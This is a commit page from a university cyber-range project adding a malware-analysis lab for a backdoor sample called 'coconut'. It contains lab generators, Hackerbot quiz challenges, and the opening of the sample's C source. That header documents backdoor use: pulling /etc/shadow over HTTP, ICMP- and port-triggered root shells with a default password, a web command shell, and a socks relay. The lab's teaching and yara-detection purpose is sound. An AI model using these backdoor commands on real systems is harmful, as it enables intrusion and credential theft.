digital-forensics-labs/SecGen
1
0
Fork 0
mirror of https://github.com/cliffe/SecGen.git synced 2026-02-21 11:18:06 +00:00
Code Issues Packages Projects Releases Wiki Activity

REMA Lab for Malware Behaviour: Live sample analysis of the coconut malware sample. Includes template updates for kali base.

Browse Source
This commit is contained in:
thomashaw
2023-11-22 15:21:54 +00:00
parent efe95bd2ef
commit ef461bb8b1
27 changed files with 2902 additions and 4 deletions
Download Patch File Download Diff File Expand all files Collapse all files

4
modules/bases/kali_light_msf/secgen_metadata.xml
View File

@@ -16,8 +16,8 @@
<distro>Kali Linux Rolling</distro>
<url>https://app.vagrantup.com/secgen/boxes/kali_light_msf/versions/1.0/providers/virtualbox.box</url>
<esxi_url></esxi_url>
<ovirt_template>kali_linux_msf_20230615</ovirt_template>
<proxmox_template>kali-linux-msf-20230615</proxmox_template>
<ovirt_template>kali-linux-mfs-20231114</ovirt_template>
<proxmox_template>kali-linux-mfs-20231114</proxmox_template>
<reference>https://app.vagrantup.com/secgen</reference>

0
modules/generators/structured_content/coconut_config/coconut_config.pp Normal file
View File

0
modules/generators/structured_content/coconut_config/manifests/.no_puppet Normal file
View File

92
modules/generators/structured_content/coconut_config/secgen_local/local.rb Normal file
View File

@@ -0,0 +1,92 @@
#!/usr/bin/ruby
require_relative '../../../../../lib/objects/local_string_encoder.rb'
class CocoConfigGenerator < StringEncoder
attr_accessor :pack_binary
attr_accessor :include_source
attr_accessor :welcome_msg_code
attr_accessor :bd_timeout
attr_accessor :http_bd_port
attr_accessor :icmp_bd_port
attr_accessor :bind_bd_port
attr_accessor :transport_port
attr_accessor :bd_password
def initialize
super
self.module_name = 'Account Generator / Builder'
self.pack_binary = ''
self.include_source = ''
self.welcome_msg_code = ''
self.bd_timeout = ''
self.http_bd_port = ''
self.icmp_bd_port = ''
self.bind_bd_port = ''
self.transport_port = ''
self.bd_password = ''
end
def encode_all
coconut_hash = {}
coconut_hash['pack_binary'] = self.pack_binary
coconut_hash['include_source'] = self.include_source
coconut_hash['welcome_msg_code'] = self.welcome_msg_code
coconut_hash['bd_timeout'] = self.bd_timeout
coconut_hash['http_bd_port'] = self.http_bd_port
coconut_hash['icmp_bd_port'] = self.icmp_bd_port
coconut_hash['bind_bd_port'] = self.bind_bd_port
coconut_hash['transport_port'] = self.transport_port
coconut_hash['bd_password'] = self.bd_password
self.outputs << coconut_hash.to_json
end
def get_options_array
super + [['--pack_binary', GetoptLong::REQUIRED_ARGUMENT],
['--include_source', GetoptLong::REQUIRED_ARGUMENT],
['--welcome_msg_code', GetoptLong::REQUIRED_ARGUMENT],
['--bd_timeout', GetoptLong::REQUIRED_ARGUMENT],
['--http_bd_port', GetoptLong::REQUIRED_ARGUMENT],
['--icmp_bd_port', GetoptLong::REQUIRED_ARGUMENT],
['--bind_bd_port', GetoptLong::REQUIRED_ARGUMENT],
['--transport_port', GetoptLong::REQUIRED_ARGUMENT],
['--bd_password', GetoptLong::REQUIRED_ARGUMENT]]
end
def process_options(opt, arg)
super
case opt
when '--pack_binary'
self.pack_binary << arg;
when '--include_source'
self.include_source << arg;
when '--welcome_msg_code'
self.welcome_msg_code << arg;
when '--bd_timeout'
self.bd_timeout << arg;
when '--http_bd_port'
self.http_bd_port << arg;
when '--icmp_bd_port'
self.icmp_bd_port << arg;
when '--bind_bd_port'
self.bind_bd_port << arg;
when '--transport_port'
self.transport_port << arg;
when '--bd_password'
self.bd_password << arg;
end
end
def encoding_print_string
'pack_binary: ' + self.pack_binary.to_s + print_string_padding +
'include_source: ' + self.include_source.to_s + print_string_padding +
'welcome_msg_code: ' + self.welcome_msg_code.to_s + print_string_padding +
'bd_timeout: ' + self.bd_timeout.to_s + print_string_padding +
'http_bd_port: ' + self.http_bd_port.to_s + print_string_padding +
'icmp_bd_port: ' + self.icmp_bd_port.to_s + print_string_padding +
'bind_bd_port: ' + self.bind_bd_port.to_s + print_string_padding +
'transport_port: ' + self.transport_port.to_s + print_string_padding +
'bd_password: ' + self.bd_password.to_s
end
end
CocoConfigGenerator.new.run

96
modules/generators/structured_content/coconut_config/secgen_metadata.xml Normal file
View File

@@ -0,0 +1,96 @@
<?xml version="1.0"?>
<generator xmlns="http://www.github/cliffe/SecGen/generator"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.github/cliffe/SecGen/generator">
<name>Coconut Config Generator</name>
<author>Thomas Shaw</author>
<module_license>MIT</module_license>
<description>Generates all parameters required by the coconut malware sample's configuration</description>
<type>coconut_config_generator</type>
<type>coconut_config</type>
<platform>linux</platform>
<read_fact>pack_binary</read_fact>
<read_fact>include_source</read_fact>
<read_fact>welcome_msg_code</read_fact>
<read_fact>bd_timeout</read_fact>
<read_fact>http_bd_port</read_fact>
<read_fact>icmp_bd_port</read_fact>
<read_fact>bind_bd_port</read_fact>
<read_fact>transport_port</read_fact>
<read_fact>bd_password</read_fact>
<default_input into="pack_binary">
<value>true</value>
</default_input>
<default_input into="include_source">
<value>false</value>
</default_input>
<default_input into="welcome_msg_code">
<generator type="random_hex">
<input into="line_length">
<value>6</value>
</input>
<input into="number_of_lines">
<value>1</value>
</input>
</generator>
</default_input>
<default_input into="bd_timeout">
<generator type="number">
<input into="minimum">
<value>60</value>
</input>
<input into="maximum">
<value>300</value>
</input>
</generator>
</default_input>
<default_input into="http_bd_port">
<generator type="number">
<input into="minimum">
<value>1025</value>
</input>
<input into="maximum">
<value>65535</value>
</input>
</generator>
</default_input>
<default_input into="icmp_bd_port">
<generator type="number">
<input into="minimum">
<value>1025</value>
</input>
<input into="maximum">
<value>65535</value>
</input>
</generator>
</default_input>
<default_input into="bind_bd_port">
<generator type="number">
<input into="minimum">
<value>1025</value>
</input>
<input into="maximum">
<value>65535</value>
</input>
</generator>
</default_input>
<default_input into="transport_port">
<generator type="number">
<input into="minimum">
<value>1025</value>
</input>
<input into="maximum">
<value>65535</value>
</input>
</generator>
</default_input>
<default_input into="bd_password">
<generator type="weak_password_generator"/>
</default_input>
<output_type>json</output_type>
</generator>

0
modules/generators/structured_content/hackerbot_config/rema_coconut/manifests/.no_puppet Normal file
View File

0
modules/generators/structured_content/hackerbot_config/rema_coconut/rema_coconut.pp Normal file
View File

48
modules/generators/structured_content/hackerbot_config/rema_coconut/secgen_local/local.rb Normal file
View File

@@ -0,0 +1,48 @@
#!/usr/bin/ruby
require_relative '../../../../../../lib/objects/local_hackerbot_config_generator.rb'
class REMACoconut < HackerbotConfigGenerator
attr_accessor :desktop_ip
attr_accessor :hackerbot_server_ip
attr_accessor :victim_server_ip
attr_accessor :coconut_config
def initialize
super
self.module_name = 'Hackerbot Config Generator REMA Coconut'
self.title = 'REMA Coconut'
self.local_dir = File.expand_path('../../', __FILE__)
self.templates_path = "#{self.local_dir}/templates/"
self.config_template_path = "#{self.local_dir}/templates/rema_coconut.xml.erb"
self.html_template_path = "#{self.local_dir}/templates/labsheet.html.erb"
self.desktop_ip = ''
self.hackerbot_server_ip = ''
self.victim_server_ip = ''
self.coconut_config = ''
end
def get_options_array
super + [['--desktop_ip', GetoptLong::REQUIRED_ARGUMENT],
['--coconut_config', GetoptLong::REQUIRED_ARGUMENT],
['--victim_server_ip', GetoptLong::REQUIRED_ARGUMENT],
['--hackerbot_server_ip', GetoptLong::REQUIRED_ARGUMENT]]
end
def process_options(opt, arg)
super
case opt
when '--desktop_ip'
self.desktop_ip << arg;
when '--hackerbot_server_ip'
self.hackerbot_server_ip << arg;
when '--victim_server_ip'
self.victim_server_ip << arg;
when '--coconut_config'
self.coconut_config << arg;
end
end
end
REMACoconut.new.run

50
modules/generators/structured_content/hackerbot_config/rema_coconut/secgen_metadata.xml Normal file
View File

@@ -0,0 +1,50 @@
<?xml version="1.0"?>
<generator xmlns="http://www.github/cliffe/SecGen/generator"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.github/cliffe/SecGen/generator">
<name>Hackerbot config for the REMA coconut analysis lab</name>
<author>Thomas Shaw</author>
<author>Mo Hassan</author>
<module_license>GPLv3</module_license>
<description>Generates a config file for a Hackerbot for the REMA coconut analysis lab.</description>
<type>hackerbot_config</type>
<platform>linux</platform>
<read_fact>flags</read_fact>
<read_fact>root_password</read_fact>
<read_fact>desktop_ip</read_fact>
<read_fact>hackerbot_server_ip</read_fact>
<read_fact>victim_server_ip</read_fact>
<read_fact>coconut_config</read_fact>
<default_input into="accounts">
<generator type="account">
<input into="username">
<value>vagrant</value>
</input>
</generator>
</default_input>
<default_input into="flags">
<generator type="flag_generator"/>
<generator type="flag_generator"/>
<generator type="flag_generator"/>
<generator type="flag_generator"/>
<generator type="flag_generator"/>
<generator type="flag_generator"/>
<generator type="flag_generator"/>
<generator type="flag_generator"/>
<generator type="flag_generator"/>
<generator type="flag_generator"/>
</default_input>
<default_input into="root_password">
<value>puppet</value>
</default_input>
<output_type>hackerbot</output_type>
</generator>

29
modules/generators/structured_content/hackerbot_config/rema_coconut/shared/labsheet.html.erb Normal file
View File

@@ -0,0 +1,29 @@
<html>
<head>
<title><%= self.title %></title>
</head>
<body>
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="css/github-markdown.css">
<style>
.markdown-body {
box-sizing: border-box;
min-width: 200px;
margin: 0 auto;
padding: 45px;
}
@media (max-width: 767px) {
.markdown-body {
padding: 15px;
}
}
</style>
<article class="markdown-body">
<%= self.html_rendered %>
</article>
<script src="js/code-prettify/loader/run_prettify.js"></script>
</body>
</html>

6
modules/generators/structured_content/hackerbot_config/rema_coconut/shared/license.md.erb Normal file
View File

@@ -0,0 +1,6 @@
## License
This lab by Mohamed Hassan and Thomas Shaw at Leeds Beckett University is licensed under a [*Creative Commons Attribution-ShareAlike 4.0 License*](https://creativecommons.org/licenses/by-sa/4.0/).
This work is licensed under a creative common "Attribution-NonCommercial-ShareAlike 4.0" license. A human-readable summary of the license is the following: You are free to copy and redistribute the material in any medium or format. You must give appropriate credit. If you remix, transform, or build upon the material, you must distribute your contributions under the same license as the original. You may not use the material for commercial purposes. See at https://creativecommons.org/licenses/by-sa/4.0/
![small](images/leedsbeckett-logo.png)

43
modules/generators/structured_content/hackerbot_config/rema_coconut/templates/intro.md.erb Normal file
View File

@@ -0,0 +1,43 @@
# Malware Behaviour - Reverse Engineering and Analysis of the Coconut Malware Sample
## Getting started
### VMs in this lab
==Start these VMs== (if you haven't already):
- hackerbot_server: <%= $hackerbot_server_ip %> (leave it running, you don't log into this)
- desktop: <%= $desktop_ip %>
- victim_server: <%= $victim_server_ip %>
### Your login details for the "desktop" VM
User: <%= $main_user %>
Password: tiaspbiqe2r (**t**his **i**s **a** **s**ecure **p**assword **b**ut **i**s **q**uite **e**asy **2** **r**emember)
You won't login to the hackerbot_server, but the VM needs to be running to complete the lab.
### For marks in the module
1. **You need to submit flags**. Note that the flags and the challenges in your VMs are different to other's in the class. Flags will be revealed to you as you complete challenges throughout the module. Flags look like this: ==flag{*somethingrandom*}==. Submit your flags in Hacktivity to register your progress in the lab.
2. **You need to document the work and your solutions in a Log Book**. This needs to include screenshots (including the flags) of how you solved each Hackerbot challenge and a writeup describing your solution to each challenge, and answering any "Log Book Questions". The Log Book will be submitted later in the semester.
## Meet Hackerbot!
![small-right](images/skullandusb.svg)
This exercise involves Hackerbot, a chatbot who will interact with you and your system. If you satisfy Hackerbot by completing the challenges she will reveal flags to you.
**On the desktop VM:**
==Open Pidgin and send some messages to Hackerbot:==
- Try asking Hackerbot some questions
- Send "help"
- Send "list"
- Send "hello"
Work through the following exercises, completing the Hackerbot challenges as noted.
---
# Purpose
The victim_server has been infected with a malware sample. Your desktop analysis machine has a copy of the binary sample which is running on the victim_server at the path: /home/<%= $main_user %>/malware/coconut.
This task involves analysing the coconut malware sample. Hackerbot will provide you with a series of practical challenges and quiz questions about the malware sample and reward you with flags for successful completion. Further flags can be found on the infected system (victim_server).

114
modules/generators/structured_content/hackerbot_config/rema_coconut/templates/labsheet.html.erb Normal file
View File

@@ -0,0 +1,114 @@
<html>
<head>
<title><%= self.title %></title>
</head>
<body>
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="css/github-markdown.css">
<style>
.markdown-body {
box-sizing: border-box;
min-width: 200px;
margin: 0 auto;
padding: 45px;
}
.markdown-body h4[id^='hackerbot']:after {
display: inline-block;
float: right;
content: url("images/skullandusb.svg");
width: 30px;
}
article {
float: right;
width: calc(100% - 300px);
}
.toc {
float: left;
font-size: smaller;
color: #1a1d22;
width: 300px;
position: fixed;
height: calc(100% - 56px);
overflow-y: scroll;
font-family: sans-serif;
margin-top: 50px;
}
.toc ul {
list-style-type: none;
padding: 0;
margin-left: 1em;
}
.toc li { /* Space between menu items*/
margin: 1em 0;
}
.toc a {
color: #1a1d22;
text-decoration: none;
}
.toc a:hover {
color: #6c036d;
text-decoration: none;
}
.toc a:visited {
color: #1a1d22;
text-decoration: none;
}
.markdown-body pre, .markdown-body code {
background-color: #570138;
color: whitesmoke;
}
.markdown-body img[alt="small-left"] {
max-width: 100px;
float: left;
}
.markdown-body img[alt="small-right"] {
max-width: 100px;
float: right;
}
.markdown-body img[alt="tiny-right"] {
max-width: 30px;
float: right;
}
.markdown-body img[alt="small"] {
max-width: 100px;
display: block;
margin-left: auto;
margin-right: auto;
padding: 15px;
}
mark {
background-color: white;
color: #5b29bd;
font-weight: bolder;
}
@media (max-width: 767px) {
.markdown-body {
padding: 15px;
min-width: 200px;
}
.toc {
float: none;
width: 100%;
position: relative;
overflow: auto;
height: auto;
}
article {
float: none;
width: 100%;
}
}
</style>
<div class="toc">
<%= self.html_TOC_rendered %>
</div>
<article class="markdown-body">
<%= self.html_rendered %>
</article>
<script src="js/code-prettify/loader/run_prettify.js?autoload=true&amp;skin=sunburst&amp;lang=css"></script>
</body>
</html>

6
modules/generators/structured_content/hackerbot_config/rema_coconut/templates/license.md.erb Normal file
View File

@@ -0,0 +1,6 @@
## License
This lab by Mohamed Hassan and Thomas Shaw at Leeds Beckett University is licensed under a [*Creative Commons Attribution-ShareAlike 4.0 License*](https://creativecommons.org/licenses/by-sa/4.0/).
This work is licensed under a creative common "Attribution-NonCommercial-ShareAlike 4.0" license. A human-readable summary of the license is the following: You are free to copy and redistribute the material in any medium or format. You must give appropriate credit. If you remix, transform, or build upon the material, you must distribute your contributions under the same license as the original. You may not use the material for commercial purposes. See at https://creativecommons.org/licenses/by-sa/4.0/
![small](images/leedsbeckett-logo.png)

419
modules/generators/structured_content/hackerbot_config/rema_coconut/templates/rema_coconut.xml.erb Normal file
View File

@@ -0,0 +1,419 @@
<%
require 'json'
require 'securerandom'
require 'digest/sha1'
require 'fileutils'
require 'erb'
require 'openssl'
if self.accounts.empty?
abort('Sorry, you need to provide an account')
end
$coconut_config = JSON.parse(self.coconut_config)
$first_account = JSON.parse(self.accounts.first)
$main_user = $first_account['username'].to_s
$root_password = self.root_password
$desktop_ip = self.desktop_ip
$hackerbot_server_ip = self.hackerbot_server_ip
$victim_server_ip = self.victim_server_ip
$flags = self.flags
$path_to_sample = "/home/#{$main_user}/malware/coconut"
$welcome_msg_code = $coconut_config['welcome_msg_code']
$http_bd_port = $coconut_config['http_bd_port']
$bd_timeout = $coconut_config['bd_timeout']
$icmp_bd_port = $coconut_config['icmp_bd_port']
$bind_bd_port = $coconut_config['bind_bd_port']
$transport_port = $coconut_config['transport_port']
$bd_password = $coconut_config['bd_password']
$q_bindport_rand = rand(1024..49151)
REQUIRED_FLAGS = 11
while $flags.length < REQUIRED_FLAGS
$flags << "flag{#{SecureRandom.hex}}"
Print.err "Warning: Not enough flags provided to hackerbot_config generator, some flags won't be tracked/marked!"
end
$yara_flag_1 = $flags.pop
$yara_flag_2 = $flags.pop
def get_binding
binding
end
-%>
<?xml version="1.0"?>
<hackerbot
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.github/cliffe/SecGen/hackerbot">
<!--<hackerbot xmlns="http://www.github/cliffe/SecGen/hackerbotz"-->
<name>Hackerbot</name>
<AIML_chatbot_rules>config/AIML</AIML_chatbot_rules>
<!--Method for gaining shell access, can be overwritten per-attack-->
<get_shell>sshpass -p <%= $root_password %> ssh -oStrictHostKeyChecking=no root@{{chat_ip_address}} /bin/bash</get_shell>
<messages>
<show_attack_numbers />
<greeting>Your system is about to be hacked. I'll do what I can hold them off, but you are going to have to work with me to protect yourself. I'll cough up some flags if you work with me.</greeting>
<!--Must provide alternatives for each message-->
<say_ready>Let me know when you are 'ready', if you want to move on to another attack, say 'next', or 'previous' and I'll move things along.</say_ready>
<say_ready>When you are ready, simply say 'ready'.</say_ready>
<say_ready>'Ready'?</say_ready>
<say_ready>Better hurry, the attack is imminent... Let me know when you're 'ready'.</say_ready>
<next>Ok, I'll do what I can to move things along...</next>
<next>Moving things along to the next attack...</next>
<next>Ok, next attack...</next>
<previous>Ok, I'll do what I can to back things up...</previous>
<previous>Ok, previous attack...</previous>
<previous>Ok, backing up.</previous>
<goto>Ok, skipping it along.</goto>
<goto>Let me see what I can do to goto that attack.</goto>
<last_attack>That was the last attack for now. You can rest easy, until next time... (End.)</last_attack>
<last_attack>That was the last attack. Game over?</last_attack>
<first_attack>You are back to the beginning!</first_attack>
<first_attack>This is where it all began.</first_attack>
<getting_shell>Ok. Gaining shell access, and running post command...</getting_shell>
<getting_shell>Hacking in progress...</getting_shell>
<getting_shell>Attack underway...</getting_shell>
<getting_shell>Here we go...</getting_shell>
<got_shell>We are in to your system.</got_shell>
<got_shell>You are pwned.</got_shell>
<got_shell>We have shell.</got_shell>
<repeat>Let me know when you are 'ready', if you want to move on to another attack, say 'next', or 'previous' and I'll move things along.</repeat>
<repeat>Say 'ready', 'next', or 'previous'.</repeat>
<!--Single responses:-->
<help>I am waiting for you to say 'ready', 'next', 'previous', 'list', 'goto *X*', or 'answer *X*'</help>
<say_answer>Say "The answer is *X*".</say_answer>
<no_quiz>There is no question to answer</no_quiz>
<correct_answer>Correct</correct_answer>
<incorrect_answer>Incorrect</incorrect_answer>
<invalid>That's not possible.</invalid>
<non_answer>Wouldn't you like to know.</non_answer>
<!--can be overwritten per-attack-->
<shell_fail_message>Oh no. Failed to get shell... You need to let us in.</shell_fail_message>
</messages>
<tutorial_info>
<title>REMA Malware Behaviour - Coconut</title>
<tutorial><%= ERB.new(File.read self.templates_path + 'intro.md.erb').result(self.get_binding) %></tutorial>
<footer>
<%= File.read self.templates_path + 'resources.md.erb' %>
|
<%= File.read self.templates_path + 'license.md.erb' %>
Randomised instance generated by [SecGen](http://github.com/cliffe/SecGen) (<%= Time.new.to_s %>)
</footer>
<provide_tutorial>true</provide_tutorial>
</tutorial_info>
<attack>
<!-- topic: Packer identification -->
<prompt>I have a question that will require you to perform some analysis on the coconut malware sample, found at: <%= $path_to_sample %></prompt>
<suppress_command_output_feedback/>
<pre_shell>echo 'OK'</pre_shell>
<get_shell>false</get_shell>
<post_command/>
<condition>
<output_matches>OK</output_matches>
<message>OK...</message>
<trigger_quiz />
</condition>
<condition>
<output_matches>OK..</output_matches>
<message>OK..</message>
<trigger_quiz />
</condition>
<else_condition>
<message>Something went wrong.</message>
</else_condition>
<quiz>
<question>What is the name of the packing software used to compress the code in the coconut malware sample?</question>
<answer>UPX</answer>
<correct_answer_response>Well done:) <%= $flags.pop %></correct_answer_response>
<trigger_next_attack />
</quiz>
</attack>
<attack>
<!-- topic: Open port identification -->
<prompt>The next question is related to the state of the infected system. Perform a network scan to assist you with the following question.</prompt>
<suppress_command_output_feedback/>
<pre_shell>echo 'OK'</pre_shell>
<get_shell>false</get_shell>
<post_command/>
<condition>
<output_matches>OK</output_matches>
<message>OK...</message>
<trigger_quiz />
</condition>
<condition>
<output_matches>OK..</output_matches>
<message>OK..</message>
<trigger_quiz />
</condition>
<else_condition>
<message>Something went wrong.</message>
</else_condition>
<quiz>
<question>One of the users on the infected system has run the coconut malware sample. Which port has the malware sample opened on the infected system?</question>
<answer><%= $http_bd_port %></answer>
<correct_answer_response>Well done:) <%= $flags.pop %></correct_answer_response>
<trigger_next_attack />
</quiz>
</attack>
<attack>
<!-- topic: icmp_shell function -->
<prompt>I have another question that will require you to perform further analysis on the coconut malware sample, found at: <%= $path_to_sample %></prompt>
<suppress_command_output_feedback/>
<pre_shell>echo 'OK'</pre_shell>
<get_shell>false</get_shell>
<post_command/>
<condition>
<output_matches>OK</output_matches>
<message>OK...</message>
<trigger_quiz />
</condition>
<condition>
<output_matches>OK..</output_matches>
<message>OK..</message>
<trigger_quiz />
</condition>
<else_condition>
<message>Something went wrong.</message>
</else_condition>
<quiz>
<question>What is the name of the function that launches the icmp shell? (include brackets, e.g. "The answer is function_name()").</question>
<answer>icmp_shell()</answer>
<correct_answer_response>Well done:) <%= $flags.pop %></correct_answer_response>
<trigger_next_attack />
</quiz>
</attack>
<attack>
<!-- topic: icmp_shell port -->
<prompt>I have another question that will require you to perform further analysis on the coconut malware sample, found at: <%= $path_to_sample %></prompt>
<suppress_command_output_feedback/>
<pre_shell>echo 'OK'</pre_shell>
<get_shell>false</get_shell>
<post_command/>
<condition>
<output_matches>OK</output_matches>
<message>OK...</message>
<trigger_quiz />
</condition>
<condition>
<output_matches>OK..</output_matches>
<message>OK..</message>
<trigger_quiz />
</condition>
<else_condition>
<message>Something went wrong.</message>
</else_condition>
<quiz>
<question>Which port does the ICMP backdoor open a shell on?</question>
<answer><%= $icmp_bd_port %></answer>
<correct_answer_response>Well done:) <%= $flags.pop %></correct_answer_response>
<trigger_next_attack />
</quiz>
</attack>
<attack>
<!-- topic: shell timeout -->
<prompt>This question is related to the activity timeout on the shell sessions.</prompt>
<suppress_command_output_feedback/>
<pre_shell>echo 'OK'</pre_shell>
<get_shell>false</get_shell>
<post_command/>
<condition>
<output_matches>OK</output_matches>
<message>OK...</message>
<trigger_quiz />
</condition>
<condition>
<output_matches>OK..</output_matches>
<message>OK..</message>
<trigger_quiz />
</condition>
<else_condition>
<message>Something went wrong.</message>
</else_condition>
<quiz>
<question>How many seconds does the bind shell backdoor stay active for, before automatically closing due to inactivity? (e.g. "The answer is n", where n is the number of seconds as an integer)</question>
<answer><%= $bd_timeout %></answer>
<correct_answer_response>Well done:) <%= $flags.pop %></correct_answer_response>
<trigger_next_attack />
</quiz>
</attack>
<attack>
<!-- topic: shell timeout -->
<prompt>This question is related to the password used to access the shell sessions.</prompt>
<suppress_command_output_feedback/>
<pre_shell>echo 'OK'</pre_shell>
<get_shell>false</get_shell>
<post_command/>
<condition>
<output_matches>OK</output_matches>
<message>OK...</message>
<trigger_quiz />
</condition>
<condition>
<output_matches>OK..</output_matches>
<message>OK..</message>
<trigger_quiz />
</condition>
<else_condition>
<message>Something went wrong.</message>
</else_condition>
<quiz>
<question>What is the password used to access the backdoor shell?</question>
<answer><%= $bd_password %></answer>
<correct_answer_response>Well done:) <%= $flags.pop %></correct_answer_response>
<trigger_next_attack />
</quiz>
</attack>
<attack>
<!-- topic: shell timeout -->
<prompt>The next question is related the backdoor shell session.</prompt>
<suppress_command_output_feedback/>
<pre_shell>echo 'OK'</pre_shell>
<get_shell>false</get_shell>
<post_command/>
<condition>
<output_matches>OK</output_matches>
<message>OK...</message>
<trigger_quiz />
</condition>
<condition>
<output_matches>OK..</output_matches>
<message>OK..</message>
<trigger_quiz />
</condition>
<else_condition>
<message>Something went wrong.</message>
</else_condition>
<quiz>
<question>What is the code attached to the welcome message that is presented to the user when they successfully access the backdoor?</question>
<answer><%= $welcome_msg_code %></answer>
<correct_answer_response>Well done:) <%= $flags.pop %></correct_answer_response>
<trigger_next_attack />
</quiz>
</attack>
<attack>
<!-- topic: binding shell to specific port -->
<prompt>The next question is related the http backdoor's bind shell functionality.</prompt>
<suppress_command_output_feedback/>
<pre_shell>echo 'OK'</pre_shell>
<get_shell>false</get_shell>
<post_command/>
<condition>
<output_matches>OK</output_matches>
<message>OK...</message>
<trigger_quiz />
</condition>
<condition>
<output_matches>OK..</output_matches>
<message>OK..</message>
<trigger_quiz />
</condition>
<else_condition>
<message>Something went wrong.</message>
</else_condition>
<quiz>
<question>The http backdoor contains functionality to open a bind shell on a specified port. Which URL can be accessed over HTTP to trigger the malware sample to open a bind shell backdoor on port <%= $q_bindport_rand %>?</question>
<answer><%= $victim_server_ip %>:<%= $http_bd_port %>/bindport:<%= $q_bindport_rand %></answer>
<correct_answer_response>Well done:) <%= $flags.pop %></correct_answer_response>
<trigger_next_attack />
</quiz>
</attack>
<attack>
<!-- topic: exfiltration -->
<prompt>This challenge will require you to use one of the backdoors (of your choosing) to exfiltrate a file from the infected system. One of the users has a file containing top secret information within their home directory. Find the file and store a local copy on your VM at the path: /home/<%= $main_user %>/top_secret_file</prompt>
<suppress_command_output_feedback/>
<post_command>shasum /home/<%= $main_user %>/top_secret_file</post_command>
<condition>
<output_matches>OK</output_matches>
<message>Ok...</message>
</condition>
<condition>
<output_matches>9737a2f11c391517bc23b8f77d441f7c3d27e545 /home/<%=$main_user %>/top_secret_file</output_matches>
<message>Well done :) <%=$flags.pop %></message>
<trigger_next_attack/>
</condition>
<else_condition>
<message>Your top_secret_file does not contain the same data as the server's.</message>
</else_condition>
</attack>
<attack>
<!-- topic: yara rules -->
<prompt>This challenge involves create a yara rule to detect the malware sample. Create a file containing your yara rule at /home/<%=$main_user %>/coconut.yara</prompt>
<suppress_command_output_feedback/>
<post_command>upx_sample_check=$(xxd /home/<%=$main_user %>/malware/coconut | grep UPX > /dev/null; echo $?); ls /home/<%=$main_user %>/coconut.yara; yara_file=$?; yara /home/<%= $main_user%>/coconut.yara /home/<%= $main_user%>/malware/coconut; yara_err=$?; positive_match=$(yara /home/<%= $main_user%>/coconut.yara /home/<%= $main_user%>/malware/coconut | wc -l); bin_false_pos_n=$(yara /home/<%= $main_user%>/coconut.yara /bin/ | wc -l); usr_bin_false_pos_n=$(yara /home/<%= $main_user%>/coconut.yara /usr/bin/ | wc -l); bin_false_pos=$(if (( $bin_false_pos_n > 0 )); then echo "T"; else echo "F";fi;); usr_bin_false_pos=$(if (( $usr_bin_false_pos_n > 0 )); then echo "T"; else echo "F";fi;); echo $upx_sample_check$yara_file$yara_err$positive_match$bin_false_pos$usr_bin_false_pos</post_command>
<condition>
<output_matches>1\d\d\d[FT][FT]</output_matches>
<message>Your coconut malware sample does not appear to be the original UPX packed file. Try revert your VM to its initial state and try again.</message>
</condition>
<condition>
<output_matches>02\d\d[FT][FT]</output_matches>
<message>No file found at /home/<%=$main_user %>/coconut.yara - have you created your rules file?</message>
</condition>
<condition>
<output_matches>001\d[FT][FT]</output_matches>
<message>There was an error when attempting to run your yara rule. Check your syntax and review any error messages from yara.</message>
</condition>
<condition>
<output_matches>0000[FT][FT]</output_matches>
<message>Your rules file is correctly formatted, but your rule does not match the coconut malware sample.</message>
</condition>
<condition>
<output_matches>0001FF</output_matches>
<message>Well done! Your rule matches the coconut malware sample and does not trigger a false positive on the system binaries. Here are some flags: <%= $yara_flag_1 %> <%= $yara_flag_2 %> (note: you may have already received the first one for partial completion of this challenge)</message>
<trigger_next_attack/>
</condition>
<condition>
<output_matches>0001FT</output_matches>
<message>Well done. Your rule is matching the coconut malware sample, here's a flag: <%= $yara_flag_1 %>. Unfortunately your rule generated false positives with system binaries. Improve your rule to earn another flag.</message>
</condition>
<else_condition>
<message>Something was wrong with your rule.</message>
</else_condition>
</attack>
</hackerbot>

3
modules/generators/structured_content/hackerbot_config/rema_coconut/templates/resources.md.erb Normal file
View File

@@ -0,0 +1,3 @@
## References
[1] Stinson, Douglas R. and Paterson, Maura B. *Cryptography Theory and Practice*. 4th edition. CRC Press, 2019.

2
modules/utilities/unix/audit_tools/reversing_tools/manifests/install.pp
View File

@@ -1,7 +1,7 @@
class reversing_tools::install {
Exec { path => ['/bin', '/usr/bin', '/usr/local/bin', '/sbin', '/usr/sbin'] }
ensure_packages(['gdb', 'git', 'ltrace', 'strace', 'valgrind', 'pax-utils', 'binwalk', 'vbindiff', 'ssdeep', 'pyew', 'gcc-multilib'])
ensure_packages(['gdb', 'git', 'ltrace', 'strace', 'valgrind', 'pax-utils', 'binwalk', 'vbindiff', 'ssdeep', 'pyew', 'gcc-multilib','yara'])
# java
ensure_packages(['procyon-decompiler'])

2
modules/utilities/unix/malware/coconut/coconut.pp Normal file
View File

@@ -0,0 +1,2 @@
require coconut::install
require coconut::service

805
modules/utilities/unix/malware/coconut/files/coconut.c Normal file
View File

@@ -0,0 +1,805 @@
/************************************************************************
* coconut.c is based on allinone.c
*
* a Http server,
* a sockets transmit server,
* a shell backdoor,
* a icmp backdoor,
* a bind shell backdoor,
* a like http shell,
* it can translate file from remote host,
* it can give you a socks5 proxy,
* it can use for to attack, jumps the extension, Visits other machines.
* it can give you a root shell.:)
*
* Usage:
* compile:
* gcc -o allinone allinone.c -lpthread
* run on target:
* ./coconut
*
* 1.httpd server
* Client:
* http://target:9009/givemefile/etc/passwd
* lynx -dump http://target:9009/givemefile/etc/shadow > shadow
* or wget http://target:9009/givemefile/etc/shadow
*
* 2.icmp backdoor
* Client:
* ping -l 101 target (on windows)
* ping -s 101 -c 4 target (on linux)
* nc target 8090
* allesgute:) --> your password
*
* 3.shell backdoor
* Client:
* nc target 9009
* allesgute:) --> your password
*
* 4.bind a root shell on your port
* Client:
* http://target:9009/bindport:8899
* nc target 8899
* allesgute:) --> your password
*
* 5.sockets transmit
* Client:
* http://target:9009/socks/:local listen port::you want to tran ip:::you want to tran port
* http://target:9009/socks/:1080::192.168.0.1:::21
* nc target 1080
*
* 6.http shell
* Client:
* http://target:9009/givemeshell:ls -al (no pipe)
*
* ps:
* All bind shell have a passwd, default is: allesgute:)
* All bind shell will close, if Two minutes do not have the connection.
* All bind shell only can use one time until reactivates.
